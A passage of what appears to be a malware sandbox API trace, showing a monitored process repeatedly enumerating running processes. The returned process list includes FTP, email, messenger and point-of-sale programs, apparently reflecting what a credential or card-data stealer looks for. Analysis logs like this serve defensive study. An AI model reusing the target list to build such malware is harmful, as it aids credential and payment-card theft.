th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0225.463] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0225.495] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0225.497] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.498] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.500] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0225.501] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0225.502] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0225.504] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0225.505] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.506] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0225.508] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0225.509] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.511] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0225.515] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0225.516] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0225.517] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0225.519] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0225.520] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0225.521] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0225.523] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0225.524] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0225.526] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0225.530] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0225.531] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0225.532] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0225.534] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0225.535] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0225.537] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0225.538] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0225.539] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0225.541] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0225.608] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0225.609] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0225.611] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0225.612] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0225.613] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0225.615] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0225.616] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0225.618] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0225.620] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0225.624] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0225.626] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0225.627] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0225.629] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0225.631] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0225.632] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0225.634] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0225.638] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0225.640] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0225.641] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0225.643] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0225.645] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0225.647] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0225.649] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0225.650] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0225.677] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0225.679] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0225.680] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0225.682] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0225.686] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0225.687] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0225.689] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0225.690] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0225.692] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0225.693] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0225.695] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0225.696] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0225.698] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0225.702] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0225.703] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0225.705] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0225.706] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0225.708] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0225.710] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0225.711] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0225.713] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0225.766] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0225.767] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0225.769] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.770] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0225.772] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0225.774] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0225.775] CloseHandle (hObject=0xdc4) returned 1 [0225.775] Sleep (dwMilliseconds=0x64) [0225.920] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0225.930] Process32First (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 